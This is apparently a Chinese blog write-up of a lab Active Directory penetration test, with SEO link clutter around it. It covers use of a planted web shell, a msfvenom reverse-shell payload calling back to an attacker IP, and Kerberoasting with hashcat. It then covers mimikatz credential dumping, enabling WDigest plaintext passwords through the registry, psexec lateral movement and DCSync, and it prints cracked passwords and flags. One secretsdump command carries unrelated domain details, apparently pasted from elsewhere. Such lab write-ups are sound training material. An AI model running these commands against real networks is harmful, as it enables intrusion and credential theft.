当前位置: 首页 > wzjs >正文

做网站的工作量wordpress 迅搜

做网站的工作量,wordpress 迅搜,wordpress 访客记录,前端软件开发工程师是什么1.前提 在开展外部渗透测试期间,我们的团队成员在对面向外部的Web服务器进行侦察时,成功发现并利用了一个文件上传点。由于项目优先级调整,该成员在转至紧急项目前,已在/uploads目录部署了受密码保护的Web shell(凭据…

1.前提

在开展外部渗透测试期间,我们的团队成员在对面向外部的Web服务器进行侦察时,成功发现并利用了一个文件上传点。由于项目优先级调整,该成员在转至紧急项目前,已在/uploads目录部署了受密码保护的Web shell(凭据:admin:My_W3bsH3ll_P@ssw0rd!),为后续评估工作奠定了基础。此次评估获得了客户Inlanefreight的明确授权,要求我们以该初始立足点为起点,深入探索内部网络,重点关注Active Directory环境中的高风险问题。我们的目标是通过Web shell在内部网络建立初始访问,进而对AD环境进行详细枚举,识别漏洞和配置缺陷,最终实现横向移动和域妥协。

2.枚举

2.1 TCP

nmap -T4 -sV -sC -p- -Pn -n 10.129.202.242 --open
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-title: Site doesn't have a title (text/html).
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2025-05-14T12:37:28
|_  start_date: N/A
|_clock-skew: -3h50m46s

2.2 UDP

sudo nmap -Pn -n 10.129.202.242 -sU --top-ports=100 --reason

在这里插入图片描述

任务一

连接webshell

http://10.129.202.242/uploads/antak.aspx

admin:My_W3bsH3ll_P@ssw0rd!

在这里插入图片描述
webshell链接

ifconfig

在这里插入图片描述
查看网段,发现有172内网网段

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.15.12 LPORT=4444 -f exe > reverse.exe

在这里插入图片描述
拿到shell
在这里插入图片描述
在这里插入图片描述
拿到flag

任务二

使用setspn.exe 枚举 SPN

setspn.exe -Q */*

在这里插入图片描述
答案为svc_sql

任务三

破解spn密码,可以上传Rubeus.exe ,执行Kerberoasting
在这里插入图片描述
.\Rubeus.exe kerberoast /outfile:hashes.kerberoast
将hash写到本地文件中
在这里插入图片描述
拿着hash进行爆破

hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt 

在这里插入图片描述
答案lucky7

任务四

ping MS01,拿到目标ip
在这里插入图片描述
搭建内网隧道,使用ligolo-ng
在这里插入图片描述
在靶机目标上传agent.exe,启动并连接到kail端
在这里插入图片描述
隧道创建

在这里插入图片描述
发现有smb的管理员权限
在这里插入图片描述

横向移动psexec

impacket-psexec 'svc_sql':'lucky7'@172.16.6.50

在这里插入图片描述
答案是
spn$r0ast1ng_on@n_0p3n_f1re

任务五

在这里插入图片描述
需要搭建一个端口转发,172网段机器,无法直接路由到我们kali
在这里插入图片描述
可以就可以将mimikatz下载到ms01机器。
导出hash
在这里插入图片描述

sekurlsa::logonpasswords

在这里插入图片描述
发现用户名为tpetty

任务六

是拿到tp用户的密码,我们使用hashcat
这里我们无法爆破,可以使用
下面方法:
修改UseLogonCredential注册表,为1
可以得到明文密码。

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

在这里插入图片描述
然后重启机器
mimikatz.exe
由于在这里插入图片描述
我们也拥有rdp权限

xfreerdp3 /u:'svc_sql' /p:'lucky7' /v:172.16.6.50 /drive:Shared,//home/kali/

使用drive可以快速访问我们的工具
在这里插入图片描述
发现密码
在这里插入图片描述
答案为 Sup3rS3cur3D0m@inU2eR

任务七

这个用户可以执行什么攻击?
我们可以使用bloodhound 查看一下用户的ACL权限
在这里插入图片描述
在这里插入图片描述

答案是用户可以执行 DCsync

任务八

接管域,并在DC01上的管理员桌面上提交flag.txt文件的内容

impacket-secretsdump -just-dc-user dave corp.com/jeffadmin:“BrouhahaTungPerorateBroom2023!”@192.168.50.70

在这里插入图片描述
拿到DC01的ip。

在这里插入图片描述
拿到ad管理员的ntlm 哈希
在这里插入图片描述
然后使用evil-winrm

在这里插入图片描述
拿到flag

http://www.dtcms.com/wzjs/822901.html

相关文章:

  • 昆明二级站seo整站优化排名全国甲级建筑设计院名单
  • 主机屋vps网站助手代运营公司排行榜
  • 医疗网站建设代理商网站没被百度收录
  • 找做网站公司乐陵市属于哪个市
  • 郑州网站建设联系方式本地网站开发公司
  • 品牌网站建设等高端服务网页制作网站创建
  • 笔记本销售网站开发的背景建模培训机构有哪些
  • 安徽网站建python网站开发前端
  • 给别人做网站在那里接单建筑工程电影网
  • 站点与网站有什么区别汕头网站建设科技有限公司
  • 锒川市住房和城乡建设局网站公告西宁网络公司网站制作
  • 阿里云服务起做网站wordpress企业建站教程 百度 下载
  • 做网站的软件m开头沈阳大十字街附近做网站公司
  • 有做国际网站生意吗ASP网站开发教程实验总结
  • 嘉兴中小企业网站制作网站引入优酷视频
  • 中建西部建设西南有限公司网站中国建设银行信用卡旅游卡服务网站
  • 网站制作外包wordpress注册美化
  • 专业定制网站制作公司开发一款app软件需要多少钱
  • 建站模板行情中国设计最好的网站
  • 中国建设银行官网站e路护航下载网站出现建设中
  • 网站制作 服务建筑设计大专有用吗
  • 深圳网站建设叶林门户网站的基本特征多选题
  • 网站建设和管理维护山东省建设工程电子信息网站
  • 织梦网站调节网站域名在哪个网站卖好
  • 做网站的前途合肥网站搜索优化
  • 做pc端网站行情海洋聚创抖音代运营
  • 东莞的网站建设公司锻件开发设计公司
  • 怎样建设网站官网公众号 一键导入wordpress
  • 顺德大良网站建设开发做淘客需要网站
  • 佛山免费自助建站模板wordpress免费版能加标签